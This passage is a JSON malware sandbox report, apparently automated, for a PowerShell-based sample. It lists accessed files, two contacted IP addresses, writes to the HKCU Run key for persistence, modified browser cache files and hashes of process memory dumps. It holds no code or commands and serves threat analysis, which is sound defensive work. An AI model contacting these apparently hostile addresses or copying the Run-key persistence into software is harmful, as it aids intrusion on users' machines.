{ "analysis_details": { "creation_time": "2017-08-21 17:58 (UTC+2)", "execution_successful": true, "number_of_processes": 7, "termination_reason": "timeout", "type": "analysis_details", "version": 1, "vm_analysis_duration_time": "00:02:13" }, "artifacts": { "files": [ { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.config", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\5p5NrGJn0jS HALPmcxz", "hashes": [], "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", "hashes": [], "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users", "hashes": [], "norm_filename": "c:\\users", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", "hashes": [], "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32", "hashes": [], "norm_filename": "c:\\windows\\system32", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows", "hashes": [], "norm_filename": "c:\\windows", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "178.89.159.34", "type": "ip_address_artifact", "version": 1 }, { "ip_address": "178.89.159.35", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [ { "operations": [ "write", "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\\u0001", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Script\\Features", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\COM3", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKCU\\software\\microsoft\\windows\\currentversion\\run\\", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": [], "type": "url_artifact", "url": "178.89.159.34", "version": 1 }, { "operations": [], "type": "url_artifact", "url": "178.89.159.35", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/e0ecab06cf1a6d34af4f54ea2fde9189572ede3d", "file_type": "modified_file", "id": "file_2", "md5_hash": "e240cbb4588ea4f6d728281bb03d4868", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "sha1_hash": "e0ecab06cf1a6d34af4f54ea2fde9189572ede3d", "sha256_hash": "5eb84960d0e21d21afbee036ca968627e0920a0ec9ad0804e6271b15441ef2a5", "size": 49152, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/faa8d7915f6733c93678128d032d26c150eb1550", "file_type": "modified_file", "id": "file_3", "md5_hash": "52860b79194a2bd3b1e66300587b21cf", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "sha1_hash": "faa8d7915f6733c93678128d032d26c150eb1550", "sha256_hash": "b3e7c1e6e0d6859d21aadf673fc01f33289fb30ce4b39edb6ecaccc0f8ff6f0a", "size": 32768, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/b82e77ed9a3dff893f0a5266c470ed67d3f48856", "file_type": "modified_file", "id": "file_4", "md5_hash": "fbdf4ba6c43b1ae50b9cef65661d27d5", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "sha1_hash": "b82e77ed9a3dff893f0a5266c470ed67d3f48856", "sha256_hash": "c608d3ec31fe48785961b02a20dc1e9f1e2c5710e4c6ae9ddbb1472db238ec73", "size": 65536, "type": "extracted_file", "version": 1 } ], "process_dumps": [ { "archive_path": "process_dumps/process_00000001-region_00000001-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000001-region_00000001-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_5", "md5_hash": "277981bd85ac80a41393544a33103d26", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "41bdd0b06da191835bac973e660b0b15d57d8152", "sha256_hash": "9f7cfa5a2374089860110e9d922e6301ea93552cfbb2340d56a226121265c955", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000002-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000002-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_6", "md5_hash": "779ac2977ebbe7487fef5eb4620b584e", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "12f8e35093b9ed0695af2757d58fd6a17ad8cb2d", "sha256_hash": "ad6ae19a5528f63d4b554c7e905ea12fcc539559d440c8616b2c7e3609f8a049", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000004-addr_0x0000000000050000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000001-region_00000004-addr_0x0000000000050000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_7", "md5_hash": "a1739cf639f18e136f4f6d0b29900fc8", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "521c4e1ca5ea9dd38a8626c2d26551f4d94d093d", "sha256_hash": "c4b18af37d696a4a24f538a757335e48dc014454d7a64811d3cbf70bec62a14d", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000005-addr_0x0000000000090000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000001-region_00000005-addr_0x0000000000090000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_8", "md5_hash": "192401d5f925a8f90d3fb44b5c59c6f0", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c8d54ff9290109b2acdd80f6bc31894b88bca83f", "sha256_hash": "450d597847bb644349312bfdd207bd18ce1d426bfb72bc91fca3d06e2c1822e6", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000007-addr_0x0000000000400000-size_0x0000000000015000-perm_rwx.bin", "filename": "process_00000001-region_00000007-addr_0x0000000000400000-size_0x0000000000015000-perm_rwx.bin", "id": "proc_dump_9", "md5_hash": "4fea036aa209e86938a7f60b230fc0c5", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "275cca59b9361b98586a94401bc6ada057a7caf7", "sha256_hash": "faa75af143451394eeb12387841c7b4308a9d4650ba5d7d7272657ce9215f64f", "size": 86016, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000011-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000001-region_00000011-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_10", "md5_hash": "df177f2d8872b8bc29b98e5a0c39b549", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fbd1d1b1e802ad64cbce17385405549415687d48", "sha256_hash": "79f097d1c47a8b204054ccfc4db2666cba0a0063cae2790675d208d5f0a1b8cb", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000012-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000012-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_11", "md5_hash": "9a6145dcb8e468de7ce0d66a7ea06007", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1196a6a1afee5d6f59df47812b5c256a3978db88", "sha256_hash": "63ef4d045a754d082edfd9fcd1d9fa9f21fa4177daf484f8899d781cf4c82969", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000013-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000013-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_12", "md5_hash": "9c5cddd74d5d3285520fafffe5991574", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d9dcaa4e39616b433e40d826f53fa7b501f7192f", "sha256_hash": "f7d98d83f6260c8acea7e22541a3bb2a35f7925441747163a221d87617360c50", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000015-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "filename": "process_00000001-region_00000015-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "id": "proc_dump_13", "md5_hash": "979d6c7a77fb164c54a9b9973642a3c7", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "74a589655b0ec1f4dce5cee486779f06f24760c8", "sha256_hash": "659cf02d262a42037b206d800195cec2860e3a0e823f02a0e2241307833de313", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000149-addr_0x0000000000240000-size_0x0000000000080000-perm_rw.bin", "filename": "process_00000001-region_00000149-addr_0x0000000000240000-size_0x0000000000080000-perm_rw.bin", "id": "proc_dump_14", "md5_hash": "ba6314e38b723dfd65a1a1d75d3d5e96", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "626fdf95fdc015f9266ffc75cdbd5e4019336e4f", "sha256_hash": "3be459ae91d18f3911282cbe145554ddaab049986f90d0b0721e373cfde2576d", "size": 524288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000153-addr_0x00000000004c0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000001-region_00000153-addr_0x00000000004c0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_15", "md5_hash": "9ed3f4fc17e34d2ac01f95d4282370a5", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "6df3a21ff9384a05791469d266174591c2d36333", "sha256_hash": "30239ab1739ac3a25bdebef5943d7e34e6cf9235a9abe037cca4e5531de1c6c6", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000156-addr_0x0000000077160000-size_0x00000000000fa000-perm_rwx.bin", "filename": "process_00000001-region_00000156-addr_0x0000000077160000-size_0x00000000000fa000-perm_rwx.bin", "id": "proc_dump_16", "md5_hash": "6eeea0bcbc21bd1c0d7f0d6ae3488f7b", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fad191d56abe255a03a7b4b3b641fcfa8a4f81fe", "sha256_hash": "938a68694e4495227ebc925be61a20adb5c6c82d7dd57cc67a2717e2f9f2bf70", "size": 1024000, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000157-addr_0x0000000077260000-size_0x000000000011f000-perm_rwx.bin", "filename": "process_00000001-region_00000157-addr_0x0000000077260000-size_0x000000000011f000-perm_rwx.bin", "id": "proc_dump_17", "md5_hash": "caf76e9dd8864dfb7d729847f3595e80", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "71745f0f20bf18b3813fbb1a30eed8d41dc1d51d", "sha256_hash": "f113bc4b90aa0447b7992c2783d7c3b16d63f0e65e2c54c6e93ba833e8e0c667", "size": 1175552, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000173-addr_0x0000000000740000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000001-region_00000173-addr_0x0000000000740000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_18", "md5_hash": "e975ce1fa3ef2e88818a34727260ecf2", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fc7af616ebcc3eb7afa4e8827946baa48c27a5cd", "sha256_hash": "b16f07da3f2d590ba794176328f0ce029fb8b0fb4e71d10ba7ce8c1348bc26ba", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000177-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000177-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_19", "md5_hash": "ef03a2ffbf89d164b25e131f420e6343", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "bba36481837a41940e3fb1e8701854f27ee8ac91", "sha256_hash": "d0f5a08a845b0c81b0dc9e769b3ba6ae4be6f355b2f334f30f9f606d5991c1ce", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000178-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000178-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_20", "md5_hash": "baa095d0f424ded37169dccfabe2a48b", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "13de5554742b8bdbbac3f1dd140af759f9f055a4", "sha256_hash": "556d13cdbbe748d7480e2434b1f1d58ff20c3c4211c0491da0abbd118c4e58cc", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000182-addr_0x0000000000210000-size_0x0000000000015000-perm_r.bin", "filename": "process_00000001-region_00000182-addr_0x0000000000210000-size_0x0000000000015000-perm_r.bin", "id": "proc_dump_21", "md5_hash": "dbd3a447347eeb28fae651132e2081e7", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "9051aa38fa0eafaf774d5723c9d891584b9f1c7f", "sha256_hash": "65b7b8e8f8d42b7476f4bb12d7b2dda6a7a2d1eb1e8c1036128820cfa47f23cf", "size": 86016, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000183-addr_0x0000000000230000-size_0x0000000000004000-perm_rw.bin", "filename": "process_00000001-region_00000183-addr_0x0000000000230000-size_0x0000000000004000-perm_rw.bin", "id": "proc_dump_22", "md5_hash": "c9405b7f5e55a86d5fcaa6bca53a75d2", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "8d8d0cd51476a93db736761bfb89e5fa85628f01", "sha256_hash": "93148957f9f5fae9408339115f64fea702dce1e0b9ad0c49dce376cff0fe8122", "size": 16384, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000184-addr_0x00000000002c0000-size_0x0000000000004000-perm_rw.bin", "filename": "process_00000001-region_00000184-addr_0x00000000002c0000-size_0x0000000000004000-perm_rw.bin", "id": "proc_dump_23", "md5_hash": "3a2e37a6a68e03031c10d899e6b2d1a0", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "24fc296777a18af9c3995b7112d2d97606eecb0b", "sha256_hash": "43f264c64139b1fe0dfe0e82f79bc0ceb58501ee78197ae1a584a253182f1dc0", "size": 16384, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000185-addr_0x00000000002d0000-size_0x0000000000007000-perm_rw.bin", "filename": "process_00000001-region_00000185-addr_0x00000000002d0000-size_0x0000000000007000-perm_rw.bin", "id": "proc_dump_24", "md5_hash": "6f8e4a108dfdcb91f88c8887c41a41f8", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "affba646a3698c20534b983847d61b4cc73bd1c3", "sha256_hash": "61436b56dc8ea76d8ae338a3c768ca20562868355a79fd631af9348433db7a8f", "size": 28672, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000188-addr_0x00000000002e0000-size_0x0000000000060000-perm_rw.bin", "filename": "process_00000001-region_00000188-addr_0x00000000002e0000-size_0x0000000000060000-perm_rw.bin", "id": "proc_dump_25", "md5_hash": "3e28833516188d0f0fba88b51c9f5772", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "7b788138dc718012ddde392d647d9fd3308b8732", "sha256_hash": "bdf95e1c9e701165cb2c6abe8359df1bc413a7eb9387f4a33df363e681962763", "size": 393216, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000204-addr_0x0000000000300000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000001-region_00000204-addr_0x0000000000300000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_26", "md5_hash": "842499f0c38d02354df219a6747df021", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0e4798cf032b9b210713d2c234e717d2f1238f49", "sha256_hash": "019dbda18554b316f8346e1b6b089a3b2a2f3f6dadf9a811330af1d4efb16472", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000207-addr_0x0000000000350000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000001-region_00000207-addr_0x0000000000350000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_27", "md5_hash": "d2877bcad98b5e9bfa06b7df02fec763", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "cc77cb916d075ea678ebe0f0ce3160108b0dbbe1", "sha256_hash": "f6a0edf9c12dd65ce1d83fe321b707ebe7b69bfcaa43304ef7445c46a7bd20e6", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000208-addr_0x00000000005c0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000001-region_00000208-addr_0x00000000005c0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_28", "md5_hash": "7210a09b2355ff8c4cc508320dda5c0b", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e277b1231cb773c9fbf0fd0c2329881e25049cea", "sha256_hash": "8e02a33e33102a0ffdef56e140fd2e5a51d09282a72674e08647682fd2ca2d0b", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000209-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000001-region_00000209-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_29", "md5_hash": 